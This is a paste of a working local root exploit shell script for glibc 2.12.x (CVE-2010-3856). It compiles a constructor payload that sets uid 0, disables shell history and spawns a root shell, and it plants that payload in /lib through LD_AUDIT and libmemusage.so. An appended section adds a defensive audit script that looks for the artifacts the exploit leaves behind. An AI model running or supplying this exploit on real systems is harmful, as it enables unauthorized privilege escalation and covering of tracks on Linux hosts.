hackerscommunity

glibc <= 2.12.x LD_AUDIT libmemusage.so local root exploit

Mar 22nd, 2016
```sh
#!/bin/sh
#
# [+] Linux GNU/libc <= 2.12.x LD_AUDIT libmemusage.so local root exploit
#
#  Edited by Todor Donev
#  This is another exploit for CVE-2010-3856
#
#  todor.donev@gmail.com
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  http://pastebin.com/u/hackerscommunity
#
#  Disclaimer:
#  This  or  previous program  is  for Educational
#  purpose ONLY. Do not use it without permission.
#  The  usual  disclaimer  applies, especially the
#  fact  that  Todor Donev  is  not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality  provided by these
#  programs.  The author or any  Internet provider
#  bears  NO  responsibility for content or misuse
#  of these programs or  any  derivatives thereof.
#  By  using  these  programs  you accept the fact
#  that any damage (dataloss, system crash, system
#  compromise,  etc.)  caused  by the use of these
#  programs is not  Todor Donev's  responsibility.
#
#  Use  at  your  own risk and educational purpose
#  ONLY!
#
# Other exploits:
# http://www.0xdeadbeef.info/exploits/raptor_ldaudit
# http://www.0xdeadbeef.info/exploits/raptor_ldaudit2
# http://www.exploit-db.com/exploits/18105/
# http://seclists.org/fulldisclosure/2010/Oct/257
# http://seclists.org/bugtraq/2010/Oct/200
#
echo "[+] Setting umask to 0 so we have world writable files."
umask 0
echo "[+] Preparing binary payload.."
cat > /tmp/payload.c <<_EOF
void __attribute__((constructor)) init()
{
    unlink("/lib/.ploit.so");
    setuid(0);
    setgid(0);
    setenv("HISTFILE", "/dev/null", 1);
    execl("/bin/sh", "/bin/sh", "-i", 0);
}
_EOF
gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
echo "[+] Writing root owned world readable file in /lib"
LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/.ploit.so" ping 2>/dev/null
echo "[+] Filling the lib file with lib contents."
cat /tmp/exploit > /lib/.ploit.so
rm /tmp/payload.c /tmp/exploit
echo "[+] Executing payload.."
LD_AUDIT=".ploit.so" ping
```
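
An added defensive check, not part of the original paste: the script above works only if a world-writable file can be left in `/lib` (created under `umask 0` through `MEMUSAGE_OUTPUT`), so this audit flags that artifact in any trusted library directory. The function names `audit_lib_dir` and `count_findings` are hypothetical, and the check goes beyond the single `/lib/.ploit.so` path by accepting any directory as an argument.

```shell
#!/bin/sh
# Added example (not from the original paste): audit a trusted library
# directory for the file-system artifacts the script above leaves behind.
# Function names are hypothetical; pass the directories to scan as arguments.

# audit_lib_dir DIR -> prints one "REASON<TAB>PATH" line per finding
audit_lib_dir() {
    dir=$1
    # A missing directory is not a finding.
    [ -d "$dir" ] || return 0
    # World-writable regular files in a library path let any local user
    # replace code that privileged programs may later load.
    find "$dir" -xdev -type f -perm -0002 2>/dev/null |
        while IFS= read -r f; do printf 'world-writable\t%s\n' "$f"; done
    # Hidden shared objects (for example ".ploit.so") are unusual in a
    # library path and deserve manual review.
    find "$dir" -xdev -type f -name '.*.so' 2>/dev/null |
        while IFS= read -r f; do printf 'hidden-library\t%s\n' "$f"; done
}

# count_findings DIR -> number of findings reported for DIR
count_findings() {
    audit_lib_dir "$1" | wc -l | tr -d ' '
}

# Stand-alone use: sh audit.sh /lib /lib64 /usr/lib
for d in "$@"; do
    audit_lib_dir "$d"
done
```

A clean result does not show that the glibc build is patched; confirm the installed package against the distribution's advisory for CVE-2010-3856.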